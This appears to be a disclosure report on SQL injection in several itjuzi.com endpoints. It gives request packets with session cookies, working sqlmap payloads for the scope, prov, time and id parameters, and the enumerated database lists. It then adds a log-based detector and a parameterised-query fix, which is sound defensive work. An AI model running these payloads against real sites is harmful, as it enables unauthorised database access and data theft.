IT orange multi-site SQL injection 4 (involving a large number of databases)

Source: Internet
Author: User
Tags: redmine

[HD] building network security with personal glory in the name of a team

 

1. Data Packets:

GET /investevents?scope=1&similar_money=2&sub_scope=75 HTTP/1.1
Cookie: cisession=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2218155777735a8bba07cf79b317c7c235%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22218.205.17.171%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A107%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.21+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.21%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1435637740%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Deea558e5acc865deaf8a977cb17317b2; BAIDU_DUP_lcr=http://www.acunetix-referrer.com/javascript:domxssExecutionSink(0,"'\"> ()refdxss"); Hm_lvt_1c587ad486cdb6b962e94fc2002edf89=1435637252; Hm_lpvt_1c587ad486cdb6b962e94fc2002edf89=1435637252; _ga=GA1.2.1933942160.1435637253; _gat=1; bd_st=%28%7B%22s%22%3A1435637277874%2C%22r%22%3A%22http%3A//tmp.itjuzi.com/search%3Fcat%3Dcompany%26keyword%3D1%22%7D%29
Host: tmp.itjuzi.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

The scope parameter and sub_scope parameter can be injected. Here we use scope injection for demonstration.

Read the privileges:

There are so many databases that the impact is large.

GET parameter 'scope' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 1730 HTTP(s) requests:
---
Parameter: scope (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: scope=1) AND (SELECT 8906 FROM(SELECT COUNT(*),CONCAT(0x7176767871,(SELECT (ELT(8906=8906,1))),0x71706b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (7451=7451&similar_money=2&sub_scope=75

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (comment)
    Payload: scope=1) AND SLEEP(5)#&similar_money=2&sub_scope=75
---
[12:48:14] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[12:48:14] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 7
web application technology: PHP 5.4.13, Nginx
back-end DBMS: MySQL 5.0
[12:48:14] [INFO] fetching database names
[12:48:14] [INFO] the SQL query used returns 32 entries
[12:48:14] [INFO] starting 10 threads
[12:48:15] [INFO] retrieved: information_schema
[12:48:15] [INFO] retrieved: apple_cn
[12:48:15] [INFO] retrieved: apple
[12:48:15] [INFO] retrieved: bdxzjklt
[12:48:15] [INFO] retrieved: avgouzai
[12:48:15] [INFO] retrieved: blog_chktips
[12:48:15] [INFO] retrieved: dear_there
[12:48:15] [INFO] retrieved: blogitjuzi
[12:48:15] [INFO] retrieved: cciehunhun
[12:48:15] [INFO] retrieved: dengta
[12:48:15] [INFO] retrieved: demo_chktips
[12:48:15] [INFO] retrieved: dev_yahoo
[12:48:15] [INFO] retrieved: itjuzi
[12:48:15] [INFO] retrieved: letcodefly
[12:48:15] [INFO] retrieved: itjuzidemo
[12:48:16] [INFO] retrieved: kejiju
[12:48:16] [INFO] retrieved: kids_db
[12:48:16] [INFO] retrieved: meximexi
[12:48:16] [INFO] retrieved: psdhere
[12:48:16] [INFO] retrieved: mysql
[12:48:16] [INFO] retrieved: seeker
[12:48:16] [INFO] retrieved: redmine
[12:48:16] [INFO] retrieved: sochips
[12:48:16] [INFO] retrieved: seeker_test
[12:48:16] [INFO] retrieved: ssmli
[12:48:16] [INFO] retrieved: spider_article
[12:48:16] [INFO] retrieved: test
[12:48:16] [INFO] retrieved: wp_new
[12:48:16] [INFO] retrieved: zangels
[12:48:16] [INFO] retrieved: touzishuju
[12:48:18] [INFO] retrieved: wp_new_2
[12:48:19] [INFO] retrieved: chktips
available databases [32]:
[*] apple
[*] apple_cn
[*] avgouzai
[*] bdxzjklt
[*] blog_chktips
[*] blogitjuzi
[*] cciehunhun
[*] chktips
[*] dear_there
[*] demo_chktips
[*] dengta
[*] dev_yahoo
[*] information_schema
[*] itjuzi
[*] itjuzidemo
[*] kejiju
[*] kids_db
[*] letcodefly
[*] meximexi
[*] mysql
[*] psdhere
[*] redmine
[*] seeker
[*] seeker_test
[*] sochips
[*] spider_article
[*] ssmli
[*] test
[*] touzishuju
[*] wp_new
[*] wp_new_2
[*] zangels
[12:48:20] [WARNING] HTTP error codes detected during run:
400 (Bad Request) - 2 times, 500 (Internal Server Error) - 1757 times
[12:48:20] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\tmp.itjuzi.com'

2. Data Packets:

GET /invstdeal?prov=1&round=9&similar_money=1 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://car.itjuzi.com:80/
Cookie: csrf_cookie_name=8dd969eebfb7bcca1c2ef373d9d77f31; cisession=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2202d64eb824a52f46b03dab17073af0a7%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2236.250.86.185%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A107%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.21+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.21%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1435636782%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Da2768b740c73761818bea540c8499ad6
Host: car.itjuzi.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

The prov parameter can be injected.

GET parameter 'prov' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 880 HTTP(s) requests:
---
Parameter: prov (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: prov=1'||(SELECT 'vyVA' FROM DUAL WHERE 1321=1321 RLIKE (SELECT (CASE WHEN (1420=1420) THEN 1 ELSE 0x28 END)))||'&round=9&similar_money=1
---
[13:00:23] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[13:00:23] [INFO] testing MySQL
[13:00:24] [INFO] confirming MySQL
[13:00:25] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.9
back-end DBMS: MySQL >= 5.0.0
[13:00:25] [INFO] fetching database names
[13:00:25] [INFO] fetching number of databases
[13:00:25] [INFO] retrieved: 7
[13:00:27] [INFO] retrieving the length of query output
[13:00:27] [INFO] retrieved: 18
[13:01:22] [INFO] retrieved: information_schema
[13:01:22] [INFO] retrieving the length of query output
[13:01:22] [INFO] retrieved: 10
[13:01:38] [INFO] retrieved: _logitjuzi 9/10 (90%)
[13:01:56] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[13:02:16] [INFO] retrieved: @logitjuzi
[13:02:16] [INFO] retrieving the length of query output
[13:02:16] [INFO] retrieved: 10
[13:02:34] [INFO] retrieved: cacti_prod
[13:02:34] [INFO] retrieving the length of query output
[13:02:34] [INFO] retrieved: 6
[13:02:56] [INFO] retrieved: itjuzi
[13:02:56] [INFO] retrieving the length of query output
[13:02:56] [INFO] retrieved: 5
[13:03:12] [INFO] retrieved: mysql
[13:03:12] [INFO] retrieving the length of query output
[13:03:12] [INFO] retrieved: 4
[13:03:22] [INFO] retrieved: test
[13:03:22] [INFO] retrieving the length of query output
[13:03:22] [INFO] retrieved: 10
[13:03:41] [INFO] retrieved: touzishuju
available databases [7]:
[*] @logitjuzi
[*] cacti_prod
[*] information_schema
[*] itjuzi
[*] mysql
[*] test
[*] touzishuju
[13:03:41] [WARNING] HTTP error codes detected during run:
400 (Bad Request) - 1 times, 500 (Internal Server Error) - 675 times
[13:03:41] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\car.itjuzi.com'

3. Data Packets:

GET /news?time=-1&type=13 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://car.itjuzi.com:80/
Cookie: csrf_cookie_name=8dd969eebfb7bcca1c2ef373d9d77f31; cisession=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2202d64eb824a52f46b03dab17073af0a7%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2236.250.86.185%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A107%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.21+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.21%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1435636782%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Da2768b740c73761818bea540c8499ad6
Host: car.itjuzi.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

The time parameter can be injected.

I will not go into depth here.

GET parameter 'time' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 100 HTTP(s) requests:
---
Parameter: time (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: time=-1' AND (SELECT * FROM (SELECT(SLEEP(5)))WGpt) AND 'tAGM'='tAGM&type=13
---
[13:11:23] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.9
back-end DBMS: MySQL 5.0.12
[13:11:23] [INFO] fetching database names
[13:11:23] [INFO] fetching number of databases
[13:11:23] [INFO] retrieved:
[13:11:23] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
7
[13:11:47] [INFO] retrieved:
[13:11:57] [INFO] adjusting time delay to 4 seconds due to good response times
informatio

4. URL: http://tmp.itjuzi.com:80/location?fund_status=6&id=-1&type=com

The id parameter can be injected (32 databases, root privileges).

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://tmp.itjuzi.com:80/location?id=-1" OR 3 AND (SELECT 9081 FROM(SELECT COUNT(*),CONCAT(0x71716b7a71,(SELECT (ELT(9081=9081,1))),0x7162716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- dfwk21=6 AND 000507=000507 --

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://tmp.itjuzi.com:80/location?id=-1" OR 3 AND (SELECT * FROM (SELECT(SLEEP(5)))lLua)-- zpXx21=6 AND 000507=000507 --
---
[13:16:10] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.13, Nginx
back-end DBMS: MySQL 5.0
[13:16:10] [INFO] fetching database names
[13:16:10] [WARNING] reflective value(s) found and filtering out
[13:16:10] [INFO] the SQL query used returns 32 entries
[13:16:11] [INFO] retrieved: information_schema
[13:16:11] [INFO] retrieved: apple
[13:16:11] [INFO] retrieved: apple_cn
[13:16:12] [INFO] retrieved: avgouzai
[13:16:12] [INFO] retrieved: bdxzjklt
[13:16:13] [INFO] retrieved: blog_chktips
[13:16:13] [INFO] retrieved: blogitjuzi
[13:16:13] [INFO] retrieved: cciehunhun
[13:16:14] [INFO] retrieved: chktips
[13:16:14] [INFO] retrieved: dear_there
[13:16:14] [INFO] retrieved: demo_chktips
[13:16:15] [INFO] retrieved: dengta
[13:16:15] [INFO] retrieved: dev_yahoo
[13:16:15] [INFO] retrieved: itjuzi
[13:16:16] [INFO] retrieved: itjuzidemo
[13:16:16] [INFO] retrieved: kejiju
[13:16:16] [INFO] retrieved: kids_db
[13:16:17] [INFO] retrieved: letcodefly
[13:16:17] [INFO] retrieved: meximexi
[13:16:18] [INFO] retrieved: mysql
[13:16:18] [INFO] retrieved: psdhere
[13:16:18] [INFO] retrieved: redmine
[13:16:19] [INFO] retrieved: seeker
[13:16:19] [INFO] retrieved: seeker_test
[13:16:19] [INFO] retrieved: sochips
[13:16:20] [INFO] retrieved: spider_article
[13:16:20] [INFO] retrieved: ssmli
[13:16:21] [INFO] retrieved: test
[13:16:21] [INFO] retrieved: touzishuju
[13:16:21] [INFO] retrieved: wp_new
[13:16:22] [INFO] retrieved: wp_new_2
[13:16:22] [INFO] retrieved: zangels
available databases [32]:
[*] apple
[*] apple_cn
[*] avgouzai
[*] bdxzjklt
[*] blog_chktips
[*] blogitjuzi
[*] cciehunhun
[*] chktips
[*] dear_there
[*] demo_chktips
[*] dengta
[*] dev_yahoo
[*] information_schema
[*] itjuzi
[*] itjuzidemo
[*] kejiju
[*] kids_db
[*] letcodefly
[*] meximexi
[*] mysql
[*] psdhere
[*] redmine
[*] seeker
[*] seeker_test
[*] sochips
[*] spider_article
[*] ssmli
[*] test
[*] touzishuju
[*] wp_new
[*] wp_new_2
[*] zangels
[13:16:22] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 35 times
[13:16:22] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\tmp.itjuzi.com'
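All four sqlmap runs above leave the same two traces on the server side: request parameters carrying a recognisable MySQL payload shape (SLEEP() for the time-based tests, FLOOR(RAND(0)*2) with GROUP BY and a hex-marked CONCAT for the error-based tests, RLIKE for the boolean-based test, INFORMATION_SCHEMA for the enumeration) and, in every summary, hundreds of HTTP 500 responses from one client. The following Python script is an added example written for this page, not part of the original report: it parses combined-format access-log lines, URL-decodes the query string, matches it against those shapes, and counts 500 responses per client. The log lines are constructed for the example (documentation-range client addresses, payloads taken from the sqlmap output above); the rule names, threshold and log format are assumptions.

```python
"""Log-side detector for the sqlmap payload shapes shown in the report (added example)."""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed access-log lines in combined-log layout (client, ident, user,
# [timestamp], "METHOD target proto", status, bytes). Addresses are documentation
# ranges; the query strings are URL-encoded copies of the payloads sqlmap printed.
SAMPLE_LOG = """\
203.0.113.5 - - [30/Jun/2015:12:48:14 +0800] "GET /investevents?scope=1%29+AND+SLEEP%285%29%23&similar_money=2&sub_scope=75 HTTP/1.1" 500 0
203.0.113.5 - - [30/Jun/2015:12:48:14 +0800] "GET /investevents?scope=1%29+AND+%28SELECT+8906+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x7176767871%2C%28SELECT+%28ELT%288906%3D8906%2C1%29%29%29%2C0x71706b7a71%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x%29a%29+AND+%287451%3D7451&similar_money=2&sub_scope=75 HTTP/1.1" 500 0
203.0.113.5 - - [30/Jun/2015:13:00:23 +0800] "GET /invstdeal?prov=1%27%7C%7C%28SELECT+%27vyVA%27+FROM+DUAL+WHERE+1321%3D1321+RLIKE+%28SELECT+%28CASE+WHEN+%281420%3D1420%29+THEN+1+ELSE+0x28+END%29%29%29%7C%7C%27&round=9&similar_money=1 HTTP/1.1" 200 4096
198.51.100.7 - - [30/Jun/2015:13:05:01 +0800] "GET /investevents?scope=1&similar_money=2&sub_scope=75 HTTP/1.1" 200 8192
203.0.113.5 - - [30/Jun/2015:13:05:02 +0800] "GET /news?time=-1&type=13 HTTP/1.1" 500 0
"""

# Combined-log prefix up to and including the status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})\b'
)

# Each rule names the payload family sqlmap reported and the token that marks it.
# Rule names are this example's own labels, not sqlmap terminology.
RULES = [
    ("time-based blind (SLEEP)", re.compile(r"\bSLEEP\s*\(", re.I)),
    ("error-based (FLOOR(RAND(0)*2))",
     re.compile(r"\bFLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I)),
    ("boolean-based blind (RLIKE)", re.compile(r"\bRLIKE\b", re.I)),
    ("schema enumeration (INFORMATION_SCHEMA)", re.compile(r"\bINFORMATION_SCHEMA\b", re.I)),
    ("hex-marked CONCAT", re.compile(r"\bCONCAT\s*\(\s*0x[0-9a-f]+", re.I)),
]


def classify_query(query):
    """Return the names of every rule that matches the URL-decoded query string.

    Decoding first matters: sqlmap sends its payload percent-encoded, so a rule
    applied to the raw query string would see %28 instead of '('.
    """
    decoded = unquote_plus(query)
    return [name for name, rx in RULES if rx.search(decoded)]


def parse_line(line):
    """Split one combined-log line into ip, path, query and status; None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    path, _, query = m.group("target").partition("?")
    return {"ip": m.group("ip"), "path": path, "query": query, "status": int(m.group("status"))}


def scan_log(text, error_threshold=3):
    """Flag payload-shaped requests and clients that trigger repeated 5xx responses.

    The 5xx count is the second signal: the sqlmap summaries above show 1757, 675
    and 35 server errors per run, which stand out even when payloads are encoded.
    """
    hits = []
    errors = Counter()
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["status"] >= 500:
            errors[rec["ip"]] += 1
        rules = classify_query(rec["query"])
        if rules:
            hits.append((rec["ip"], rec["path"], rules))
    noisy = sorted(ip for ip, n in errors.items() if n >= error_threshold)
    return {"hits": hits, "server_errors": dict(errors), "noisy_clients": noisy}


if __name__ == "__main__":
    report = scan_log(SAMPLE_LOG)
    for ip, path, rules in report["hits"]:
        print(f"{ip} {path}: {', '.join(rules)}")
    print("5xx per client:", report["server_errors"])
    print("clients over threshold:", report["noisy_clients"])
```

Run against the constructed log, three of the five requests match a rule and one client accounts for all three server errors; the fourth request (the benign baseline with the same parameters) matches nothing, which is the point of matching on payload tokens rather than on parameter names. The 5xx counter is deliberately independent of the rules so that an encoded or obfuscated payload that slips past the token list still surfaces through the error burst.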


 

Solution:

Filter user-supplied parameters before they reach the SQL query.
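What "filter" has to mean for these endpoints is shown below as an added example, not the site's PHP code: every injectable parameter in the report (scope, sub_scope, prov, time, id) is a numeric identifier, so the fix is an allow-list check that admits only a plain integer, combined with bound query parameters so the DBMS never parses the value as SQL. The example is written in Python against an in-memory SQLite table that stands in for the MySQL data; the table, its columns, the sample rows and the parenthesised WHERE clause are assumptions (the parenthesis is chosen to match the `scope=1) AND ...` shape of the sqlmap payloads above, which must close a bracket before adding a condition).

```python
"""Vulnerable query shape beside its filtered, parameterised form (added example)."""
import re
import sqlite3


def make_db():
    """Constructed table: three events, two of them in scope 1 (an assumption, not the site's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE invest_events (id INTEGER, scope INTEGER, sub_scope INTEGER, name TEXT)"
    )
    conn.executemany(
        "INSERT INTO invest_events VALUES (?, ?, ?, ?)",
        [(1, 1, 75, "event A"), (2, 1, 80, "event B"), (3, 2, 75, "event C")],
    )
    return conn


def events_unsafe(conn, scope, sub_scope):
    """Vulnerable shape: request values spliced into the SQL text.

    Because the value becomes part of the statement, a value that closes the
    bracket and appends its own condition changes what the query means.
    """
    sql = "SELECT name FROM invest_events WHERE (scope=%s) AND sub_scope=%s" % (scope, sub_scope)
    return [row[0] for row in conn.execute(sql)]


# Allow-list: an optional sign and up to nine decimal digits, nothing else.
INT_RE = re.compile(r"-?[0-9]{1,9}")


def int_param(name, value):
    """Reject anything that is not a plain decimal integer before it gets near the query."""
    if not isinstance(value, str) or INT_RE.fullmatch(value) is None:
        raise ValueError("parameter %r is not an integer: %r" % (name, value))
    return int(value)


def events_safe(conn, scope, sub_scope):
    """Hardened shape: validated values passed as bound parameters.

    Binding is the real defence; the allow-list is defence in depth that also
    gives a clean 4xx-style rejection instead of a 500 when the value is junk.
    """
    sql = "SELECT name FROM invest_events WHERE scope=? AND sub_scope=?"
    args = (int_param("scope", scope), int_param("sub_scope", sub_scope))
    return [row[0] for row in conn.execute(sql, args)]


if __name__ == "__main__":
    conn = make_db()
    print(events_safe(conn, "1", "75"))             # ['event A']
    print(events_unsafe(conn, "1) OR (1=1", "75"))  # all three rows: the tautology wins
    try:
        events_safe(conn, "1) OR (1=1", "75")
    except ValueError as err:
        print("rejected:", err)
```

The unsafe variant is kept only to make the difference observable: with the same inputs the filtered, bound query returns exactly the rows the parameters name and raises on anything that is not an integer, so the error-based and time-based tests sqlmap ran above have no SQL context to land in.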
